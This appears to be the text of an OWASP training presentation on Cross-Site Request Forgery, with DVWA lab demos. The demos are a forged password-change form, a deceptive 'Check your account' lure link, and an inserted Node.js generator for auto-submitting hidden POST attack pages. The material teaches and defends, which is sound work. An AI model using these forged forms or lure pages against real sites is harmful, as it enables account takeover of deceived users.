Understanding CSRF


UNDERSTANDING CROSS SITE REQUEST FORGERY

John Patrick Lita - OWASP Manila Chapter President

Venue: Philippine Army, Cyber Security Division, Taguig City

OWASP Taguig Chapter

DEEP UNDERSTANDING WITH CSRF VULNERABILITY

MEET THE PRESENTER

OWASP Manila Chapter President

Project Manager at Enterprise Linux Professionals

Owner of Active Security Training and Consultancy

Project leader for OWASP Online Academy

john.patrick.lita@owasp.org

2


CROSS SITE REQUEST FORGERY

Cross-Site Request Forgery (CSRF) is an attack that forces an end user to execute unwanted actions on a web application in which they're currently authenticated. CSRF attacks specifically target state-changing requests, not theft of data, since the attacker has no way to see the response to the forged request. With a little help of social engineering (such as sending a link via email or chat), an attacker may trick the users of a web application into executing actions of the attacker's choosing. If the victim is a normal user, a successful CSRF attack can force the user to perform state changing requests like transferring funds, changing their email address, and so forth. If the victim is an administrative account, CSRF can compromise the entire web application.

3

CSRF ILLUSTRATION

Slides 4 to 9

Figure (slides 4 to 9): two comment forms are shown side by side, a "Regular Form" and a "CSRF Form Template", each with a "COMMENT HERE:" field and a "POST" button. In the first sequence the user Jaypee types "I AM AWESOME!" into the regular form and posts it; the comment is shown as "Jaypee: I AM AWESOME!". In the second sequence the text "I AM NOOB!" is submitted through the CSRF Form Template instead of the application's own form, and the comment is again shown as "Jaypee: I AM NOOB!": the application attributes the forged request to Jaypee because his browser sent his session with it.

CANNOT READ THE ANTI-CSRF

10


NO SERVER SIDE VALIDATION

11


REVIEWING THE FORM

12

CHECKING THE SOURCE CODE

13

CSRF DEMO

PREVENTION MEASURES THAT DO NOT WORK

CSRF TEMPLATE WEB INTERFACE

Copy the source code of the CSRF Template (next page, slide 16), save it as an HTML file and open the file in any browser in which you are logged in to DVWA. Click "Change" and analyse the behaviour: the browser sends the forged request to DVWA together with your existing session cookie, so the request only succeeds from a browser that holds a valid session. After that, try to log in again to see whether the password was changed.

15


CSRF TEMPLATE SOURCE CODE

<!DOCTYPE html>
<html>
<head>
  <title>CSRF Template</title>
</head>
<body>
  <br>
  <!-- Forged password-change request: the form targets the DVWA CSRF page with GET,
       and the victim's browser attaches the DVWA session cookie when it is submitted. -->
  <form action="http://172.16.157.129/dvwa/vulnerabilities/csrf/?" method="GET">
    New Password:<br>
    <input type="password" autocomplete="off" name="password_new" value="12345"><br>
    Confirm New Password:<br>
    <input type="password" autocomplete="off" name="password_conf" value="12345"><br>
    <input type="submit" value="Change" name="Change">
  </form>
</body>
</html>

16


PREVENTION MEASURES THAT DO NOT WORK

▸ Using a secret cookie

▸ Remember that all cookies, even the secret ones, will be submitted with every request. All authentication tokens will be submitted regardless of whether or not the end-user was tricked into submitting the request. Furthermore, session identifiers are simply used by the application container to associate the request with a specific session object. The session identifier does not verify that the end-user intended to submit the request.

17


PREVENTION MEASURES THAT DO NOT WORK

▸ Only Accept POST requests

▸ Applications can be developed to only accept POST requests for the execution of business logic. The misconception is that since the attacker cannot construct a malicious link, a CSRF attack cannot be executed. Unfortunately, this logic is incorrect. There are numerous methods in which an attacker can trick a victim into submitting a forged POST request, such as a simple form hosted in an attacker's Website with hidden values. This form can be triggered automatically by JavaScript or can be triggered by the victim who thinks the form will do something else.
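As an added example (not from the talk), here is a small Node.js helper that generates the kind of attacker page the paragraph describes: a hidden POST form that a script submits as soon as the page loads, so the victim does not even have to click. The target URL is a placeholder; the field names are reused from the slides' DVWA template for illustration only (that template targets DVWA with GET), and the page would be served from the attacker's own origin.

```javascript
// Added example (not from the talk): build a lure page whose hidden form
// forges a POST to a state-changing endpoint. TARGET is a placeholder.
const TARGET = "http://target.example/account/change-password"; // assumed endpoint

// Escape attribute values so a field value cannot break out of the markup.
function escapeAttr(s) {
  return String(s)
    .replace(/&/g, "&amp;")
    .replace(/"/g, "&quot;")
    .replace(/</g, "&lt;")
    .replace(/>/g, "&gt;");
}

// Returns the HTML of the lure page: a hidden POST form plus a script that
// submits it on load. The victim's browser attaches its cookies for the target
// origin automatically, which is exactly why "POST only" does not stop CSRF.
function forgedPostPage(action, fields) {
  const inputs = Object.entries(fields)
    .map(([name, value]) =>
      `    <input type="hidden" name="${escapeAttr(name)}" value="${escapeAttr(value)}">`)
    .join("\n");
  return `<!DOCTYPE html>
<html>
<head><title>Loading...</title></head>
<body>
  <form id="f" action="${escapeAttr(action)}" method="POST">
${inputs}
  </form>
  <script>document.getElementById("f").submit();</script>
</body>
</html>
`;
}

// Constructed payload: the parameter names from the slides' DVWA template,
// now carried in a POST body instead of the query string.
const PAYLOAD = {
  password_new: "12345",
  password_conf: "12345",
  Change: "Change",
};

// Usage: write the generated page to a file on the attacker's site.
const PAGE = forgedPostPage(TARGET, PAYLOAD);
```

Because the form is submitted by script, the same page works whether the victim clicks anything or merely opens a link from an email or chat message.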


18


PREVENTION MEASURES THAT DO NOT WORK

▸ Multi-Step Transactions: Multi-step transactions are not an adequate prevention of CSRF. As long as an attacker can predict or deduce each step of the completed transaction, CSRF is possible.

▸ URL Rewriting: This might be seen as a useful CSRF prevention technique because the attacker cannot guess the victim's session ID. However, the user's session ID is then exposed in the URL, where it can leak through logs, browser history and Referer headers. We don't recommend fixing one security flaw by introducing another.

▸ HTTPS: HTTPS does nothing to defend against CSRF. TLS protects the request in transit, but the forged request is still sent by the victim's own browser, with the victim's cookies, over the same encrypted connection.

19

CSRF DEMO

CSRF ATTACK USING SOCIAL ENGINEERING

One attack vector, described on the slide as click jacking, is a lure link delivered by social engineering: a page whose "Click Here!" link points at the password-change URL with the attacker's values already in the query string. To test this attack, save the source code on the next page as an HTML file, open it in a browser that is logged in to DVWA, and click "Click Here!".

21


CSRF ATTACK USING SOCIAL ENGINEERING

<!DOCTYPE html>
<html>
<head>
  <title>Please Check your Account Here!</title>
</head>
<body>
  <h1>Check your account Here!</h1>
  <!-- The link carries the forged password change in its query string; clicking it
       sends the request from the victim's browser along with the DVWA session cookie. -->
  <a href="http://172.16.157.129/dvwa/vulnerabilities/csrf/?password_new=password&password_conf=password&Change=Change#">Click Here!</a>
</body>
</html>

JOHN.PATRICK.LITA@OWASP.ORG

THANK YOU FOR LISTENING
